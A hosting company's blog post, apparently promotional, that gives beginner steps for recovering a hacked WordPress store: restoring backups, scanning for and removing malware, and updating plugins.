I will never forget the panic in my friends voice when he called me to say that he thinks his website had been hacked.
It hadn’t been long since he’d launched his online store. It was a drop-shipping business, and he’d done a pretty good job at cobbling the site together using WordPress, WooCommerce, and a bunch of other plugins. The business was finally starting to get some traction.But now, in place of the store, was a simple message from Google:
This site may be hacked.
Not the sort of message that instills confidence in your average shopper!
We were very fortunate that his hosting company had a backup, and so I was able to give him a helping hand to get things restored. It took several hours, and then several days more for the warnings to drop from the website and in Google searches.
The long term damage was hard to estimate, he’d lost money on his pay-per-click advertising, and who knows how many customers would never return again (of course, I convinced him to move to Kualo as thanks to our security, these kind of incidents are extremely rare here.)
Fortunately, his business is now doing well, but after seeing him recently I was reminded of this incident. I decided to write a short guide in the hope that it may be useful to other people. I hope that I’ve managed to put together an easy to follow, quick guide that will help you recover your WordPress website and protect it in the future. As you probably know, prevention is always better than cure, meaning that securing your website in the first place is much easier than fixing it later on.
Once you've followed the steps below, we strongly recommend reading our complete guide on how to protect your WordPress.
Before we start, though, let's answer one crucial question:
How do WordPress websites get hacked in the first place?
Most WordPress hacking incidents occur primarily because of a combination of two factors:
- Outdated themes and plugins
- Poorly protected web hosting
If you have an outdated plugin or a theme, it's almost inevitable that the exploits become known in time, and your site falls victim to a hacker attack. The same goes for nulled (illegally downloaded) themes and plugins - it's almost a guarantee that somebody left a backdoor within them to later use as they please.
This is why every security guide on WordPress always recommends keeping everything updated!
More limited is the discussion around web hosting, yet this is another critical piece of the puzzle. Choosing reputable, secure web hosting is imperative as hosting providers often do a lot of work behind the scenes in order to protect their customer's websites.
With shared hosting, this is especially critical since you share the server with other websites and if one becomes infected, it may affect all the other websites on that particular server.
If your website gets hacked, it's always a good idea to consider whether you need a more secure solution when it comes to hosting. Do your research and see what other hosting providers offer and what security measures they have in place.
Let me give you an example of our own security features and what you should be looking for. On our servers, each customer is completely isolated in a caged filesystem, which means that if one customer’s website is compromised, it can’t affect another. As crazy as it seems, this still isn’t the case at every hosting company.
Our servers are further protected by multiple security layers, including a web application firewall, intrusion detection and prevention systems and real-time malware scanning. What’s more each day our Patchman tool rolls out thousands of patches to websites on our fleet of servers, helping ensure that WordPress installations and the most popular plugins are not vulnerable - even if the site owner didn’t update!
In other words, making sure that these two factors are addressed after you fix your hacked website will dramatically increase your website's level of protection.
And now, let's dive into the practical part of our guide:
How to Fix a Hacked WordPress Website
1. Restore a backupRestoring a backup should be your immediate reaction if you discover you're hacked. You may have already done that for other reasons, but if you don't know what a website backup is, it's basically a snapshot of all your website's data - design, text, images, styling, etc.
You can start by restoring a backup of your files. Your database stores things like eCommerce orders, so your orders will remain intact if you restore only your files.
Usually, reputable hosting providers make daily backups of your site, which means that you can restore it yourself or ask them for assistance. They may also offer additional backup services - we have CodeGuard - which allow you to have better control over the backup process.
Of course, the restoring point should be before the supposed time of the hacking incident, and you may not always know precisely when that was, so a few attempts might be necessary.
2. Scan and remove malicious codeFor a malware-related hacking incident, you'll need to remove the malware from your website.
An easy way is to scan your WordPress installation with a malware scanner (check some recommended scanners here) and remove all flagged files manually. Many users who aren't tech-savvy may feel worried to do so themselves, but the malware scanners will point exactly to what you need to remove and nothing else.
It's worth noting that if your hosting provider offers specialised solutions (like we do) the use of a third-party malware scanner may become redundant.
Once you get a complete list of the infected files, you can access your website files either via FTP (follow this link for an FTP use guide) or through the File Manager of cPanel (follow this link for a File Manager guide) and remove them as indicated.
Some security plugins also offer this option; one of the most popular ones is Wordfence. They also offer additional security features such as live monitoring, limited login attempts, spam comment filter, firewall and more, so it's definitely worth keeping the plugin even after you've performed your scan.
A lesser-known but also potent option is WP Cerber. They both feature very similar security options, but their interface differs, and some may prefer one to another.
Once you have cleaned your website, make sure to make a manual backup copy of your website! If you don't know how to do it, follow this guide to back up your site.
3. Update everything immediatelyWe already mentioned the importance of this. Once you've restored your website and removed the malicious code, you need to ensure you've patched whatever exploit that hacker used to get in.
As indicated above, make a fresh backup copy of your WordPress and proceed to update everything. Sometimes things may break after an update, as in you may get a blank screen, an error, etc.
In most cases, this is a plugin compatibility issue, so here's what you can do:
- Restore a backup from your newly made (clean of malware) backup copy
- Start updating your plugins one by one and check if the website is ok after each update